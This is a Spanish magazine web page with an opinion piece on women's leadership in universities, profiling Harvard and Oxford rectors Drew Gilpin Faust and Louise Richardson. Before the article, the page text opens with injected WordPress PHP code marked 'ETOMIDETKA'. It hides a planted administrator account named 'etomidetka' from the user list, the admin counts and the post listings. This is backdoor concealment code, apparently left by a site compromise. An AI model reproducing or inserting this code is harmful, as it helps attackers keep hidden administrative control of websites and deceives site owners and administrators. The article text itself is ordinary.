//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); El liderazgo de las mujeres en la pirámide académica | Revista Fusión Empresarial
El liderazgo de las mujeres en la pirámide académica

La incorporación de las mujeres a las universidades se concretó básicamente en el siglo pasado, ya que la educación superior era un espacio masculino, por lo cual, el acceso a dicho ámbito fue dándose lentamente y en un inicio, solo en algunas carreras como enfermería, educación y trabajo social, pues representaban una extensión de las funciones asociadas a tareas femeninas.
Desde 1990 hasta nuestros días, las estadísticas comenzaron a tener una consistencia positiva, respecto al crecimiento de la matrícula de mujeres por encima de la de hombres, las mujeres universitarias obtienen mejores tasas de rendimiento y de graduación, sin embargo, una vez que egresan, se enfrentan a un cuello de botella en la vida laboral, debido a las débiles o inexistentes políticas para conciliar la vida familiar y la maternidad, con la vida laboral.
En el caso de las mujeres que deciden desarrollarse en el mundo académico, se inicia la cuesta arriba como en otras profesiones, cuanto más arriba ascienden menos mujeres hay, como la mayoría de las profesiones, el ascenso femenino tiene forma piramidal.
Sin bien, aún hay mucho por avanzar en los cargos directivos, el camino que han estado abriendo mujeres rectoras en grandes universidades, constituye un testimonio y una inspiración para hacer lo propio, desde el espacio que hoy tengo oportunidad de dirigir.

Compartiré los dos casos icónicos de rectoras inspiradoras existentes en el último par de décadas, el de Drew Gilpin Faust y el de Louise Richardson.
Drew fue la primera mujer nombrada como rectora en el 2007 de la prestigiada Universidad de Harvard, la universidad más antigua de los Estados Unidos con 371 años de fundación.
Drew, está casada y es madre de una hija, es historiadora especialista en Civilización Americana y dirigía el centro de investigación Radcliff de Estudios Avanzados, antes de tomar el nombramiento número 28 como rectora, siendo no solo la primera mujer desde la fundación de la universidad, sino también la primera sin poseer un título universitario de Harvard.
Una de las afirmaciones, que dijo el día que asumió el cargo fue “Espero que mi nombramiento pueda ser el símbolo de una apertura de oportunidades que habría sido inconcebible solo una generación atrás. No soy la mujer presidenta de Harvard. Soy la presidenta de Harvard”
Forbes la ubicó como la 33ª mujer más poderosa del mundo, escritora de seis libros y finalista del premio Pulitzer y del National Book Award. Durante su mandato aumentó las ayudas económicas para estudiantes de clase media y escribió a favor de los dreamers, en el 2018 anunció su retiro tras once años al frente de tan prestigiada institución.
Louise Richardson, a sus 57 años fue nombrada rectora de la Universidad de Oxford, siendo la primera mujer en ocupar ese cargo en los 800 años desde la fundación de dicha institución, su cargo anterior fue de rectora de la Universidad de St. Andrews en Escocia en donde también inauguró la gestión femenina tras 600 años de existencia de la institución.
Louise está casada y tiene tres hijos, dos mujeres y un hombre, proviene de una familia muy humilde de la zona rural de Irlanda, tiene seis hermanos y es el primer miembro de su familia en ir a la universidad, trabajando para pagar sus estudios.

«En el caso de las mujeres que deciden desarrollarse en el mundo académico, se inicia la cuesta arriba como en otras profesiones, cuanto más arriba ascienden menos mujeres hay».

Louise ha manifestado “Mis padres no fueron a la universidad y la mayor parte de mis hermanos tampoco. La trayectoria de mi vida ha sido posible gracias a la educación, por lo que reafirmo mi total compromiso para que otros puedan tener la misma oportunidad que yo he tenido”.
Se graduó como Historiadora y se especializó en Ciencias Políticas y en Gobierno y es considerada una eminencia en materia contra la violencia política.

En conclusión, la apertura de los espacios directivos sigue siendo lento, pero el testimonio de mujeres extraordinarias, inspira y exige al mundo, reconocer el impacto positivo del liderazgo femenino, generando compromiso en las mujeres que participamos en el ámbito universitario.

Añadir Comentario